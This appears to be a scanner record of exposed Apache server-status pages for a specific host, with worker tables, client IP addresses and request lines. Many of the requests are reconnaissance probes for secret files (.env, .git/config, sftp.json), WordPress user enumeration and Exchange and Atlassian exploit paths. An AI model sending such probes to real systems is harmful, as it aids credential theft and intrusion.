23.15814327790.013.8875.66 217.113.194.71http/1.1 0-172219540/696/2490_ 23.25803425640.09.6039.54 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1694560960.62604689598083496093 1-172219570/537/6569_ 20.6723836757880.08.05167.97 217.113.194.112http/1.1 1-172219570/568/6936_ 20.7121855904850.012.34141.33 142.93.153.3http/1.1 1-172219570/663/6774_ 20.81006601450.015.84160.83 142.93.153.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-172219570/439/7021_ 20.81106749740.05.93128.36 142.93.153.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-172219570/490/6398_ 20.72606980290.09.32132.19 103.23.61.80http/1.1lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-172219570/488/7160W 20.80006398480.06.02125.11 142.93.153.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-172219570/507/7102_ 20.7921527210530.012.48142.91 142.93.153.3http/1.1 1-172219570/536/7131_ 20.6401896806020.011.42171.72 217.113.194.96http/1.1 1-172219570/436/6725_ 20.81206212840.07.22147.14 142.93.153.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-172219570/438/7202_ 20.70376811043050.09.09164.05 142.93.153.3http/1.1 2-172219550/36/3149_ 11.0943424233140.00.2861.36 142.93.153.3h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-172219550/61/3073_ 11.154603500660.01.0468.73 83.32.167.142h2barrerasdecontencion.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-172219550/90/3511_ 10.944403649180.03.1463.84 83.32.167.142h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-172219550/41/3673_ 10.914004557750.00.2275.82 217.113.194.73http/1.1 2-1722195519/77/3414W 11.1633237447768156.21.0587.71 200.68.186.77h2tandemsl.com:443GET /wp-content/uploads/2019/11/Historia-de-los-cosm%C3%A9ticos 2-172219550/93/3202_ 11.0743715265170.01.7353.36 142.93.153.3h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-172219550/108/3107_ 11.114994346200.01.4364.21 200.68.186.77h2tandemsl.com:443idle, streams: 0/20/15/0/5 (open/recv/resp/push/rst) 2-172219550/49/2928_ 11.07411823394210.01.3452.11 217.113.194.73http/1.1tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-172219550/45/3096_ 10.944704456300.03.3677.59 83.32.167.142h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-172219550/94/3115_ 11.124804379310.04.0059.56 200.68.186.77h2tandemsl.com:443idle, streams: 0/35/30/0/5 (open/recv/resp/push/rst) 3-172219560/144/5004_ 11.66291506136140.04.22131.25 52.167.144.147h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-172219560/103/4985_ 11.57304705920.01.5287.62 142.93.153.3http/1.1 3-172219560/85/5159_ 11.48382226445880.00.85142.27 217.113.194.86http/1.1 3-172219560/128/5625_ 11.67105728140.02.07135.32 142.93.153.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-172219560/166/5030_ 11.562465376520.01.72152.37 201.162.245.16h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-172219560/129/5432_ 11.562406441710.01.66127.00 201.162.245.16h2tandemsl.com:443idle, streams: 0/24/24/0/0 (open/recv/resp/push/rst) 3-172219560/162/4585_ 11.56406408480.05.24117.55 142.93.153.3h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-172219560/118/4966_ 11.64394086384080.05.30121.84 217.113.194.86http/1.1tandemsl.com:443GET /consultoria-energia-sostenibilidad/analisis-ciclo-de-vida- 3-172219560/131/5034_ 11.4731715718370.01.7498.41 142.93.153.3h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-172219560/118/5162_ 11.4702475054640.01.48108.92 217.113.194.83http/1.1tandemsl.com:443GET /medioambiente-blog/cambios-sostenibilidad-corporativa/cons 4-172220860/109/12484_ 10.982320013760480.02.15286.09 217.113.194.126http/1.1tandemsl.com:443GET /seguridad-de-producto-blog/el-rac-y-el-seac-comites-de-la- 4-172220860/103/13479_ 10.87282012746070.01.84243.68 173.234.50.13h2tandemsl.com:443idle, streams: 4/50/50/0/0 (open/recv/resp/push/rst) 4-172220860/100/12694_ 10.894013945980.01.26328.78 173.234.50.13h2tandemsl.com:443idle, streams: 1/68/68/0/19 (open/recv/resp/push/rst) 4-172220860/94/13292_ 10.88282013876300.01.07338.00 173.234.50.13h2tandemsl.com:443idle, streams: 1/50/50/0/0 (open/recv/resp/push/rst) 4-172220860/76/13140_ 10.89282012141810.00.99252.59 173.234.50.13h2tandemsl.com:443idle, streams: 10/68/68/0/3 (open/recv/resp/push/rst) 4-172220860/72/12559_ 10.89282013472330.01.03338.51 173.234.50.13h2tandemsl.com:443idle, streams: 0/68/68/0/20 (open/recv/resp/push/rst) 4-172220860/77/13547_ 10.984113124720.01.49318.96 142.93.153.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-172220860/48/13190_
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755ee95f58d
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 10-Sep-2023 18:58:21 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 12 Parent Server MPM Generation: 11 Server uptime: 3 days 7 hours 8 minutes 18 seconds Server load: 0.08 0.06 0.03 Total accesses: 164456 - Total Traffic: 3.3 GB - Total Duration: 14810657 CPU Usage: u7.28 s12.03 cu518.48 cs369.25 - .318% CPU load .577 requests/sec - 12.2 kB/second - 21.2 kB/request - 90.0585 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0139856no0yes010000 1139859no0yes010000 2139857no3yes19003 3139858no0yes010000 4139988no0yes010000 Sum503 149003 ______________________W___________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-111398560/3/1395_ 0.02101029760.00.0128.96 143.198.72.96http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-111398560/0/1328_ 0.00101161290.00.0024.47 165.22.108.223http/1.1 0-111398560/0/1597_ 0.00101220750.00.0040.86 74.213.83.249h2tandemsl.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 0-111398560/0/1493_ 0.00011062600.00.0029.28 143.198.72.96http/1.1 0-111398560/1/1405_ 0.0200992460.00.0027.24 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 0-111398560/2/1288_ 0.02001151720.00.0035.93 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 0-111398560/1/1235_ 0.02001181170.00.0030.95 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 0-111398560/1/1231_ 0.01301091720.00.0018.88 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-111398560/1/1412_ 0.02101085570.00.0042.87 143.198.72.96http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-111398560/1/1259_ 0.0224051107580.00.0323.30 66.249.70.162http/1.1tandemsl.com:443GET /equipos/ HTTP/1.1 1-111398590/1/5541_ 0.02104928920.00.00150.23 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-111398590/1/5602_ 0.00404687160.00.00110.90 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-111398590/1/5547_ 0.02305054260.00.00126.41 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-111398590/0/5959_ 0.0043815164330.00.00110.26 66.249.70.164http/1.1tandemsl.com:443GET /seguridad-de-producto/fumigacion-de-palets/ HTTP/1.1 1-111398590/0/5240_ 0.00125103010.00.00108.59 165.22.108.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-111398590/1/5970_ 0.02404939010.00.00108.04 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 1-111398590/1/5967_ 0.02105428150.00.00113.58 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-111398590/2/6013_ 0.02405405890.00.00152.11 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 1-111398590/0/5791_ 0.00124690490.00.00125.99 143.198.72.96http/1.1 1-111398590/0/6126_ 0.0031608136490.00.00140.46 165.22.108.223http/1.1 2-111398570/2/1251_ 0.0200934380.00.0316.02 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-111398570/3/1198_ 0.0300824670.00.0114.66 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-111398570/0/1228W 0.0000976250.00.0016.84 143.198.72.96http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-111398570/1/1397_ 0.0320914620.00.0125.79 143.198.72.96http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-111398570/1/1355_ 0.03201108530.00.0027.36 143.198.72.96http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-111398570/1/1058_ 0.0310966580.00.0015.44 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-111398570/2/1156_ 0.03101253840.00.0023.99 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 2-111398570/1/1014_ 0.0310856410.00.0020.42 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 2-111398570/2/1136_ 0.0310922800.00.0017.23 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-111398570/3/1108_ 0.0300805000.00.0017.83 143.198.72.96http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-111398580/3/1180_ 0.0310945230.00.1019.48 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 3-111398580/3/957_ 0.0300980230.00.0014.50 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-111398580/2/1026_ 0.03311361770.00.0124.29 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-111398580/1/1142_ 0.01021351390.00.0124.79 154.28.229.112http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-111398580/2/980_ 0.0331847670.00.0116.70 143.198.72.96http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-111398580/1/939_ 0.02201085350.00.0016.61 51.81.167.146http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-111398580/0/903_ 0.00221051060.00.0013.31 165.22.108.223h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-111398580/2/1153_ 0.0320963390.00.0020.01 143.110.156.182http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 3-111398580/1/1009_ 0.0320823410.00.0113.96 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-111398580/1/1147_ 0.0220954460.00.0014.44 143.198.72.96http/1.1 4-111399880/1/6823_ 0.01316874240.00.01155.23 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-111399880/1/7486_ 0.01205972190.00.00129.86 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-111399880/1/6787_ 0.03206003870.00.00149.02 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 4-111399880/1/7296_ 0.03206570590.00.00174.07 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-111399880/2/7356_ 0.03205882600.00.00120.13 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 4-111399880/1/7087_ 0.03206530710.00.00172.91 192.53.126.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 4-111399880/1/7225_ 0.03106681200.00.00178.92 165.22.108.223http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7558210bcae
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 12-Jul-2023 05:02:56 CEST Restart Time: Wednesday, 28-Jun-2023 18:59:25 CEST Parent Server Config. Generation: 22 Parent Server MPM Generation: 21 Server uptime: 13 days 10 hours 3 minutes 30 seconds Server load: 0.08 0.04 0.01 Total accesses: 528586 - Total Traffic: 10.8 GB - Total Duration: 60499321 CPU Usage: u29.07 s46.59 cu2283.58 cs1428.87 - .327% CPU load .456 requests/sec - 9.7 kB/second - 21.3 kB/request - 114.455 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0647907no0yes19000 1647804no0yes010000 2647806no0yes19000 3647805no0yes010000 4647939no0yes010000 Sum500 248000 W__________________________R______________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-216479070/1/16282W 0.020018957830.00.01365.54 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-216479070/2/16904_ 0.020017929540.00.00370.89 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-216479070/1/16862_ 0.020018025670.00.00405.36 134.122.89.242http/1.1 0-216479070/1/16706_ 0.020017280670.00.00363.35 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 0-216479070/0/17619_ 0.000018395160.00.00411.51 23.178.112.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.well-known/acme-challenge/uXvPwj2J6pRsjTxmnxBaiIbiRmREZC4 0-216479070/2/17670_ 0.020017366860.00.01394.62 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-216479070/1/17372_ 0.020017392230.00.00370.48 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-216479070/2/17191_ 0.020017082740.00.00419.62 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 0-216479070/0/16895_ 0.00017517543460.00.00390.05 134.122.89.242h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-216479070/2/16487_ 0.020019051440.00.00376.11 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /?rest_route=/wp/v2/users/ HTTP/1.1 1-216478040/1/4627_ 0.02005224960.00.0080.86 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 1-216478040/1/3923_ 0.02005467410.00.0090.70 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 1-216478040/1/4206_ 0.01006130620.00.0073.57 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-216478040/1/4212_ 0.02014819060.00.0178.47 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-216478040/2/4381_ 0.02005915890.00.0085.22 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-216478040/1/4783_ 0.01025784870.00.0183.63 165.227.146.2http/1.1 1-216478040/1/4508_ 0.02005594330.00.0083.53 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-216478040/1/4488_ 0.01005273120.00.0080.38 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-216478040/1/4253_ 0.02005174480.00.0090.16 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-216478040/1/4285_ 0.01005094330.00.0093.03 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 2-216478060/1/14159_ 0.010013680400.00.00275.36 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 2-216478060/2/14367_ 0.010014813040.00.01296.67 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 2-216478060/1/14649_ 0.020014630610.00.00284.88 134.122.89.242http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-216478060/1/14857_ 0.010016307440.00.00281.59 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 2-216478060/0/15038_ 0.0002314049380.00.00300.54 134.122.89.242h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-216478060/0/15247_ 0.000013893730.00.00275.20 172.68.80.71http/1.1 2-216478060/1/14520_ 0.020015198260.00.00289.74 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-216478060/1/13596R 0.010014244550.00.00253.03 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 2-216478060/0/14275_ 0.00012513971540.00.00285.67 134.122.89.242http/1.1 2-216478060/2/14511_ 0.020030400670.00.00293.69 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-216478050/0/10000_ 0.000010048850.00.00194.78 165.227.146.2h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-216478050/1/10294_ 0.010010624610.00.00196.75 134.122.89.242h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-216478050/1/10330_ 0.010010579270.00.00175.03 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-216478050/1/10371_ 0.020010987250.00.00181.81 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 3-216478050/0/10403_ 0.000110701650.00.00179.32 165.227.146.2h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-216478050/1/9730_ 0.010011109870.00.00178.12 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-216478050/0/10071_ 0.000410484530.00.00198.70 172.70.152.70http/1.1done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-216478050/0/10009_ 0.00009942490.00.00188.36 190.11.87.44h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-216478050/0/11186_ 0.00018212319360.00.00244.40 165.227.146.2h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-216478050/1/10115_ 0.010010234130.00.00188.21 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-216479390/2/6656_ 0.020010172220.00.01136.39 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 4-216479390/2/6729_ 0.030010086360.00.00166.83 161.35.27.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 4-216479390/1/6926_ 0.03009600870.00.01154.20 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-216479390/1/6469_ 0.030011340580.00.00155.23 165.227.146.2http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-216479390/2/6919_ 0.02009524780.00.00155.73 164.90.222.93http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-216479390/1/6759_ 0.030011107810.00.00148.25 51.81.167.146http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-216479390/1/6501_ 0.030010398800.00.00163
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7557f1a5cba
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Mar 24 2022 17:33:25 Current Time: Friday, 12-May-2023 22:49:59 CEST Restart Time: Saturday, 07-Jan-2023 18:56:40 CET Parent Server Config. Generation: 79 Parent Server MPM Generation: 78 Server uptime: 125 days 2 hours 53 minutes 19 seconds Server load: 0.00 0.02 0.00 Total accesses: 6721083 - Total Traffic: 127.2 GB - Total Duration: 1106707748 CPU Usage: u284.96 s451.43 cu22076.7 cs14685.5 - .347% CPU load .622 requests/sec - 12.3 kB/second - 19.8 kB/request - 164.662 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03698276no1yes010000 13698405no0yes010000 23698273no0yes19000 33698275no0yes010000 43698274no0yes010000 Sum501 149000 _____________________W____________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-7836982760/1/131935_ 0.0710182723690.00.002344.93 190.30.78.116h2tandemsl.com:443idle, streams: 0/22/22/0/0 (open/recv/resp/push/rst) 0-7836982760/8/130210_ 0.1300188653780.00.232474.82 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /config.json HTTP/1.1 0-7836982760/6/129636_ 0.1300217877990.00.052491.45 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 0-7836982760/21/127510_ 0.1210183331660.00.192486.17 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-7836982760/4/126820_ 0.1300272274730.00.012413.23 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-7836982760/7/127227_ 0.1210168449660.00.012356.90 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 0-7836982760/9/130153_ 0.1200194890550.00.032409.08 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-7836982760/3/130733_ 0.1210195279140.00.002510.15 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 0-7836982760/3/129225_ 0.0800377980760.00.012418.30 142.93.64.15h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-7836982760/2/127180_ 0.1311210322340.00.012397.47 142.93.64.15http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-7836984050/3/123718_ 0.0711317872200.00.012550.43 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-7836984050/0/124157_ 0.0010279178410.00.002471.34 186.22.54.7h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-7836984050/1/124639_ 0.0111231163830.00.012635.49 167.172.232.142http/1.1 1-7836984050/3/123204_ 0.0710214882670.00.012516.15 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 1-7836984050/2/123251_ 0.0700168361640.00.002619.08 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 1-7836984050/2/124487_ 0.050133197139900.00.012438.06 142.93.64.15h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-7836984050/1/124578_ 0.0700269165770.00.002551.70 142.93.64.15http/1.1 1-7836984050/0/124200_ 0.0000194380620.00.002399.40 167.172.232.142http/1.1 1-7836984050/2/125528_ 0.0710196394600.00.012518.22 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 1-7836984050/2/126363_ 0.0700235843530.00.002577.03 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /telescope/requests HTTP/1.1 2-7836982730/0/140892_ 0.0000231386960.00.002821.82 142.93.64.15http/1.1 2-7836982730/0/142812W 0.0000225608900.00.002832.56 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-7836982730/0/139713_ 0.0000244033870.00.002855.06 190.63.189.66h2tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-7836982730/1/140114_ 0.0410244373350.00.002667.51 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-7836982730/1/141983_ 0.0410210167890.00.002789.45 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 2-7836982730/0/141653_ 0.0031231828400.00.002725.18 83.45.6.190h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-7836982730/0/139318_ 0.0010191523370.00.002709.81 186.22.54.7h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-7836982730/2/140554_ 0.0500203306170.00.002902.70 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-7836982730/2/139703_ 0.0510227757300.00.012844.66 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 2-7836982730/0/137636_ 0.0010195542050.00.002948.84 31.13.127.16http/1.1tandemsl.com:443done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-7836982750/2/143925_ 0.0620220863340.00.092714.65 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 3-7836982750/0/143004_ 0.000473217019510.00.002726.65 181.42.41.204h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-7836982750/1/144884_ 0.0520202564890.00.002882.43 167.99.8.63http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-7836982750/2/143437_ 0.0610223070400.00.002713.34 161.35.190.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /s/0383e21363e23323e2330313/_/;/META-INF/maven/com.atlassia 3-7836982750/0/142561_ 0.000392309535870.00.002815.10 167.172.232.142h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-7836982750/2/143553_ 0.0610206228890.00.032744.94 142.93.64.15h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-7836982750/2/141010_ 0.0700215549080.00.022782.35 181.42.41.204h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-7836982750/0/143662_ 0.0000271037320.00.002717.05 167.172.232.142h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-7836982750/2/142677_ 0.0700249758010.00.002834.91 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET 